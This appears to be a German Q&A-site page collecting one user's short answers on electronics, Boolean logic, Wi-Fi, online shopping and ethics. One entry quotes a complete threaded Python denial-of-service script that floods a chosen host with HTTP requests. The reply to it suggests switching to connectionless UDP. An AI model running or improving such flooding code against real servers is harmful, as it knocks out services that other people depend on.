Was ist denn eine blöde Sex-Fantasie?...

Generell würde ich sagen: Safe, Sane, Consensual - Solange es sicher ist und keinen bleibenden gesundheitlichen Schaden verursacht, es vernünftig ausgelebt wird (indem z.B. andere nicht dabei gestört werden) und vor allem einvernehmlich von den Partnern, gibt es kaum etwas, was man nicht tun könnte. Wie du schon sagtest: Gerade bei Kindern und Tieren kann die Einvernehmlichkeit nicht festgestellt werden, es ist dann immer eine Vergewaltigung.

Die Wahrscheinlichkeit, dass es andere Menschen gibt, die ähnliche Phantasien haben, ist schon groß...

Ansonsten gilt: Was du denkst und fühlst kannst du nur sehr bedingt beeinflussen. Auf was es ankommt, sind die Taten. Das ist eine philosophische Richtung, die unter anderem von J.K Rowling in Harry Potter vertreten wird, aber - soweit ich weiß - auch von Peter Bieri/ Pascal Mercier und vielen anderen. Von der Seite ist es auch OK, wenn du etwas denkst, was moralisch verwerflich ist, es aber nicht tust.

...zur Antwort

Also ich persönlich würde es jetzt komisch finden, wenn etwas anders ist, als in der Artikelbeschreibung steht. Also z.B. wenn in der Beschreibung steht: "4 GB" und dann sind 8 GB drin. Ich würde das auch das Technische nicht unbedingt mit Service oder "Freude machen" in Verbindung bringen.

Etwas anderes wäre es jetzt, wenn z.B. ein USB-Stick dabei liegen würde, oder auch nur eine Packung Gummibärchen.

Aber das kommt sicher auch vom Käufer abhängig. Ich suche mir meine Ware nach gezielt nach technischen Daten aus. Wenn sich jetzt z.B. ein Schulkind vom Taschengeld einen PC kauft, dann freut es sich sicher mehr über den zusätzlichen RAM.

...zur Antwort

Meinst du so eine Art "Zauberschaltung"?

https://www.leifiphysik.de/elektronik/halbleiterdiode/aufgabe/zauberschaltung

Möglicherweise ist die Diode dann an der Lampe dran, oder in der Lampe drin.

...zur Antwort

Es kann sehr weh tun... Neben den 5V darf man die ca. 110V nicht vergessen, die als Gleichtaktspannung üblicherweise nach Schaltnetzteilen vorhanden ist. (natürlich nur sehr wenig Leistung) Die führt unter anderem dazu, dass man ein leichtes kribbeln/vibrieren spürt, wenn man mit dem Finger über das Metallgehäuse einer externen Festplatte fährt, oder so.

Für den Mund stelle ich mir das unangenehm vor.

...zur Antwort

Ein kleiner Fehler ist leider drin. Im zweiten Eintrag in deiner Tabelle hast du sowohl bei B, als auch bei ^B (B invertiert) eine 1 - dies stimmt nicht mit KV-Diagramm überein. Resultat ist, dass dieses ^B noch mit einem logischen UND zu dem Term dazukommt.

Ansonsten ist die Frage, was das Ziel deiner Optimierung ist. Oft möchte man zum Schluss keine verschachtelte Funktion, sondern eine DNF. Dann wäre dein letzter Umformungsschritt nicht sinnvoll.

PS: Ich habe mal einen Logikrechner für den Einstieg in digitale Logik geschrieben, vielleicht hilft er (auch wenn schon alt und nicht gewartet): https://kmio.de/logikrechner.html

...zur Antwort

Soweit ich weiß, ist der private Besitz von Plagiaten in Deutschland (im Gegensatz z.B. zu Italien) nicht verboten. Es kann aber sein, dass du es nicht importieren darfst.

Bei Ebay gibt es halt eine Menge Zeug was rechtlich nicht so ganz in Ordnung ist... Plagiate, importiere Ware ohne Zollgebühren, Waren, die gesetzliche Bestimmungen nicht einhalten (keine CE Zulassung haben, etwa zu helle Laserpointer, Multimeter mit mangelhaften Schutz...)

...zur Antwort

Das passt in der Tat nicht richtig - vor allem mit dem Iges und der Rges Rechnung.

Mal eine Frage: Wie sicher bist du dir, dass dieser Lösungsschritt richtig ist - und nicht etwa das Iges falsch eingezeichnet wurde?

Oder anders: Wie sieht die originale Aufgabe aus? Fehlen vielleicht Hinweise?

...zur Antwort

Eine Sicherung wäre die einfachste Art der Strombegrenzung. Da gäbe es auch diverse Schaltungen für elektronische Sicherungen, wenn es sehr schnell und reversibel sein soll.

Die Frage ist halt, ob weiterhin Strom fließen soll... Da gibt es Begrenzer-Schaltungen.
Das Grundprinzip für elektronische Strombegrenzung ist eigentlich immer gleich: Der Strom wird gemessen, über einen Shunt (der kann auch z.B. 0,01 Ohm haben) oder das Magnetfeld. Ist er zu hoch, öffnet ein Transistor. Mit Mosfets kannst du auch auf wenige Milli-Ohm kommen.

...zur Antwort

DoS-Attacke (python)?

Hi! :)

Ich habe vor kurzem ein dos Skript in Python geschrieben, um den Server eines Freundes zu testen. Es hat auch funktioniert, jedoch sendet es erst Anfragen wenn es sich verbinden konnte.

Deshalb wollte ich fragen, ob es möglich ist Anfragen zu senden ohne sich zu verbinden, sondern einfach zu senden ganz egal ob der Server eine Rückmeldung gibt.

Hier der Code:

import socket
import random
from threading import Thread


host = input("\nHost: \n")
port = input("Port: \n")
threads = input("Threads: \n")


useragent = ['Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux i686; rv:64.0) Gecko/20100101 Firefox/64.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Mozilla/5.0 (X11; Linux i586; rv:63.0) Gecko/20100101 Firefox/63.0', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.13) Gecko/20080313 Firefox', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; rv:1.8.1.16) Gecko/20080702 Firefox', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.9.2.20) Gecko/20110803 Firefox', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.6) Gecko/2009011913 Firefox', 'Mozilla/5.0 (X11; ; Linux x86_64; rv:1.8.1.6) Gecko/20070802 Firefox', 'Mozilla/5.0 (X11; U; Gentoo Linux x86_64; pl-PL) Gecko Firefox']


def dos():
    while True:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(useragent)+"\n"+"\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n").encode('utf-8')
        try:
            sock.connect((host, int(port)))
            sock.sendto( packet,(host, int(port)))
            print("gesendet")
        except socket.error:
            print("verbindung geschlossen")
        sock.close()
            
for i in range(int(threads)):
    t = Thread(target=dos)
    t.start()
...zur Frage

UDP ist im Gegensatz zu TCP verbindungslos. Da werden die Pakete gesendet, ohne dass es eine Rückmeldung gibt.

...zur Antwort

Nein, ich würde es aber auch nicht unbedingt für sinnvoll halten. Das Schöne ist doch, sich einfach in eine andere Welt entführen zu lassen - die in sich konsistent ist und Gegebenheiten hinzunehmen.

Uns ist ja aus wissenschaftlicher Seite auch keine Magie bekannt... Aber stark zu hinterfragen wäre auch: Warum braucht man einen Zauberstab? Warum muss man mit diesem dann noch bestimmte Bewegungen machen und bestimmte Sachen sagen? Gibt es mehrere Zaubersprachen, wie es auch mehrere zur Kommunikation gibt? Andernfalls wäre das auch unlogisch.

...zur Antwort

Also Glasfaser würde dir überhaupt nichts bringen, die würde nämlich nur bis zu deinem Router gehen. Geräte wie Laptops, Handys... lassen sich nicht daran anschließen.

Zu der Gesundheitlichen Belastung kann ich nicht mehr sagen, als dass es aktuell als ungefährlich gilt. Es gibt Grenzwerte (die z.B. in Deutschland sehr viel kleiner sind, als in USA, soweit ich weiß) und WLAN dringt nicht wirklich in den Körper ein. Bekannt ist nur die erwärmende Wirkung, die aber bei den Grenzwerten keine Rolle spielt.

Zu der Strahlung:

Sie nimmt quadratisch mit den Abstand ab. Heißt: je weiter das Gerät weg, desto (viel) geringer die Strahlung. Neben dem Kopf würde ich den Router auch nicht haben wollen. Wände dämpfen das Signal mitunter ordentlich.

Lösungen:

  1. Router/Accesspoint etwas weiter weg stellen
  2. WLAN nur einschalten, wenn man was machen will
  3. Netzwerkkabel (gibt auch USB-Adapter für Laptops, Tablets... und sollte auch für Smartphones mit USB OTG gehen)
...zur Antwort

Ohne auf das Video direkt eingehen zu wollen...

Ob man über eigene gute Taten reden sollte, ist eine philosophische Frage mit 2 verschiedenen Ansätzen:

  1. Tue Gutes und sprich darüber - auch mit dem Hintergedanken, dass so vielleicht andere auch dazu ermutigt werden, die Welt besser zu machen
  2. Tue Gutes ohne darüber zu sprechen - altruistischer Ansatz, die Handlung soll der guten Tat wegen geschehen und nicht wegen der Belohnung, dass darüber geredet wird.

Was "richtig" ist, ist schwer zu sagen - soweit ich weiß, überwiegt in Deutschland/Europa der Ansatz 2, während in anderen Ländern - ich glaube auch in USA eher der Ansatz 1 anzutreffen ist. Aber das ohne Gewähr, ich bin kein Experte auf dem Gebiet.

...zur Antwort

Wie man darauf kommt? Gute Frage... Ingenieursleistung.
Man muss dazu sagen, dass all diese BCD orientierten Systeme aus den Anfangsjahren der Computer-Technik kommen, wie auch etwa Versuche mit dreiwertigen Systemen.

BCD hat den Vorteil einer einfachen Ein- und Ausgabe, sowie guter Möglichkeiten zu debuggen, wenn man den Computer als elektronische Schaltung hat. Welche Ziele hinter den einzelnen Darstellungen stecken, wurde ja in einer anderen Antwort schon genannt. Es gibt z.B. auch noch das Aiken-System.

...zur Antwort

Also ich hatte als Kind Elektronik-Experimentierkästen, die es aber nicht mehr gibt (Schuco) Was es aber z.B. gibt, sind Experimentiersets von Conrad/ Franzis... Auch youtube-Videos und Tutorials.

Ich würde tatsächlich über die praktische Anwendung einsteigen, da ist das Ganze auch interessant aufbereitet. Von dort aus ggf. sukzessive die Grundlagen erarbeiten.

Das Studium geht einen anderen Weg: In den ersten Semestern hauptsächlich lernen, viel zu rechnen (bei uns oft auch ohne Taschenrechner), Topologien zu erkennen... Ganz ehrlich: Ein halbes Jahr lang fast ausschließlich Schaltungen mit Widerständen, Kondensatoren, Spulen, Spannungs- und Stromquellen zu behandeln (schnell zu erkennen und zu berechnen) ist nicht sonderlich reizvoll. (Na gut, man lernt fürs Leben schnell Doppelbrüche... umzuformen) :-p Und die Grundlagen elektrischer und magnetischer Felder sind für viele Schaltungen auch erst mal nicht so wichtig.

...zur Antwort

Kann es sein, dass es sich um Kohlensäurehaltige Getränke handelt?

Kohlensäure ist im Wasser gelöst und wird allmählich (Bläschen) in CO2 und H2O umgewandelt. Dadurch entsteht in der Flasche ein leichter Überdruck.

...zur Antwort

Also jedes Produkt hat ein Limit in der Entwicklung... Also der technische Fortschritt für eine konkrete Technologie. Je fortgeschrittener eine Technologie, desto mehr steigt der Aufwand, um noch etwas zu verbessern.

Besser geht es dann nicht mehr, oder es ist nicht erforderlich/ sinnvoll. Ich glaube z.B. dass die Röhrentechnologie (auch CRT-Monitore) ziemlich ausentwickelt waren. Ebenso ist es der Verbrennungsmotor.

Was aber kommt - und unvorhersagbar ist - sind neue Technologien, neue Produkte. Diese passen sich auch dem Zeitgeist an. Wenn in Zukunft z.B. Unwetter schlimmer werden, wird es dafür vermehrt Entwicklungen geben, wenn der Computer-/ Internettrend weitergeht, neuartige Interfaces.

...zur Antwort

Am Schluss liegt es ja nur an der Verkabelung. Du kannst ja mal schauen, ob an den Anschlussstellen (meist alle paar Zentimeter) was dran steht, welche Leitung für Rot, Grün, Blau, (+12V) ist.

Wenn es mit unterschiedlichen Controllern geschaltet wird, lässt sich das ggf. auch im Controller umprogrammieren. Hatte mal so ein 2€ Teil aus China mit Fernbedienung, wo das eine bestimmte Tastenkombination war (die ich zufällig gefunden hatte).

...zur Antwort

Die Aussage kommt mir komisch vor. Der HF-Bereich von 1,8 - 2,4 GHz ist noch nicht soo hoch und sollte von Blech gut abgeschirmt werden können. Natürlich in Form eines Faradayschen Käfigs (also geschlossen) - sonst könnte Strahlung aus anderen Richtungen rein kommen.

Für sehr hohe Frequenzen ist es aber tatsächlich so, dass durch die endliche Leitfähigkeit der Wand (eines Faradayschen Käfigs) Ströme auf der Wand entstehen können, die im inneren Felder erzeugen. Sehr gute Schirmkabinen sind mehrschichtig.

...zur Antwort

Hmm... kommt darauf an: BWL schätze ich als fast reines auswendig lernen ein... Ich bin damals in einer VL eingeschlafen und hab dann beschlossen, ein anderes Nebenfach zu wählen. :-p Aber das ist denke ich auch stark davon abhängig, wie es vorgetragen wird.

Informatik/Programmieren basiert halt auf logischem Denken, die ersten Programmierer waren Mathematiker (bevor es das Informatik-Studium gab). Von der Seite passt programmieren eigentlich gut zur Mathematik. - Und ich denke, du könntest in beiden Richtung davon profitieren. Ein (guter) Mathematiker kann halt abstrakte Konzepte verstehen, ohne die Materie zu kennen. Daher auch Konzepte aus der Informatik...

...zur Antwort